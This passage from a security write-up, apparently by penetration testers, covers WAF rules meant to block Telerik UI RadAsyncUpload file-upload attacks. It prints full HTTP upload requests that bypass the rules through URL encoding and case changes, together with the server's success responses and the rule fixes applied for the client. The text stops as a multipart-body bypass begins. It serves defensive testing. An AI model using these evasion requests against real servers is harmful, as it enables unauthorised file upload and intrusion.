The request must contain the "<i>type=rau</i>" parameter within the query string, since that is the command </span>for file upload.</p><p cid="n63" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This rule was enough to block basic requests, such as the one reported above, generated by automated tools that exploit the vulnerability such as </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/bao7uo/RAU_crypto" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">RAU_crypto</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">.</span></p><p cid="n64" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However, it was noticed that the Web Application Firewall <b>would not normalize</b> the value of the received parameters.</span></p><p cid="n64" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A valid bypass 
would therefore be to URL encode a character within the "<i>type</i>" parameter value "<i>rau</i>", specifically:</span></p><p cid="n65" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">"<i>rau</i>" -> "<i>ra%75</i>" where "<i>%75</i>" is the URL-encoded "<i>u</i>" character.</span></p><p cid="n66" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The following request shows how it was still possible to upload an arbitrary file to the system.</span></p><p cid="n67" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n68" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; 
margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;"><span style="background-color: #f8f8f8;">/Telerik.Web.UI.WebResource.axd?type=ra</span><span style="background-color: #fcff01;">%75</span></span> <span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; 
box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2347</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br 
/><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViNFY[Encrypted rauPostData Payload in base64]mUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span 
role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 
0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n69" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n70" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #fcff01; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span 
class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Thu, 07 May 2020 16:11:22 GMT</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":135,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" }</span></pre><p cid="n71" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It was observed that the custom rules developed for 
the specific WAF did<b> not perform normalization by default</b> on the path and query string parameters and were therefore unable to detect URL encoded characters. </span></p><p cid="n71" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">To address this bypass, the client was assisted in finding the WAF functionality that normalizes the query string parameters of the request, so that any URL encoded variant of the "<i>type=rau</i>" parameter is detected.</span></p><p cid="n72" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"So, all is good now, right?"</i></span></p><p cid="n72" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>Not quite...</i></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" 
md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>3rd WAF Rule: the "case" is still open</u></b></span></p><p cid="n74" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A regression test was then performed to confirm that the vulnerability had been patched. However, although </span>the URL encoding no longer led to a bypass, it was found that the endpoint was <b>case insensitive!</b></p><p cid="n75" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In fact, the value "<i>raU</i>" in the "<i>type</i>" parameter was still accepted, as shown in the following request:</span></p><pre cid="n78" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" 
style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;"><span style="background-color: #f8f8f8;">/Telerik.Web.UI.WebResource.axd?</span><span style="background-color: #fcff01;">type=raU</span></span> <span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span 
role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2345</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: 
border-box; padding-right: 0.1px;">ATTu5i4R+ViNFY[Encrypted rauPostData Payload in base64]mUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 
0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n79" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: 
border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n80" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span 
class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Fri, 08 May 2020 10:25:09 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":153,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" }</span></pre><p cid="n81" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">To address this new bypass it was necessary to tune the rule<i><u> so that it transformed to lower case all the characters within the query string parameters before applying the check on the presence of the "type=rau" parameter</u></i>.</span></p><p cid="n82" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: 
pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">So now we're confident that any variation of "<i>Telerik.Web.UI.WebResource.axd?type=rau</i>" within the path of the <i>HTTP</i> request would be blocked by the WAF rule. </span></p><p cid="n82" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"Is it enough now?"</i></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>4th WAF Rule: the Multipart Magic</u></b></span></p><p cid="n84" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The Telerik UI file upload functionality can only be invoked with an HTTP POST request of the "<i>multipart/form-data</i>" content type.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; 
white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The WAF rule did not allow any variations of the "<i>type=rau</i>" parameter within the URL query string of the request.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>But what if the parameter is inserted within the body of the "multipart/form-data" file upload request? </i></span></p><p cid="n125" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n124" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #f8f8f8; 